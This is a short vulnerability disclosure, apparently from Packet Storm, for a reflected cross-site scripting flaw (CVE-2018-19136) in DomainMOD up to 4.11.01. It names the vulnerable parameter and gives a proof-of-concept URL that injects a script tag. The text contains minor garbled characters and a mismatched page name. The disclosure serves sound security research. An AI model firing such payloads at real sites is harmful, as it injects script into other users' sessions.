DomainMOD 4.11.01 Cross Site Scripting

2018-11-16T00:00:00
ID PACKETSTORM:150386
Type packetstorm
Reporter Dawood Ansar
Modified 2018-11-16T00:00:00

Description

                                        
                                            `# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting  
# Date: 2018-11-09  
# Exploit Author: Dawood Ansar  
# Vendor Homepage: domainmod (https://domainmod.org/)  
# Software Link: domainmod (https://github.com/domainmod/domainmod)  
# Version: v4.09.03 to v4.11.01  
# CVE : CVE-2018-19136  
  
# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application   
# versions from v4.09.03 to v4.11.01i1/4https://github.com/domainmod/domainmod/issues/79i1/4  
# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php   
# page and inject a javascript XSS payload in raid parameter  
  
# POC:   
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1  
  
`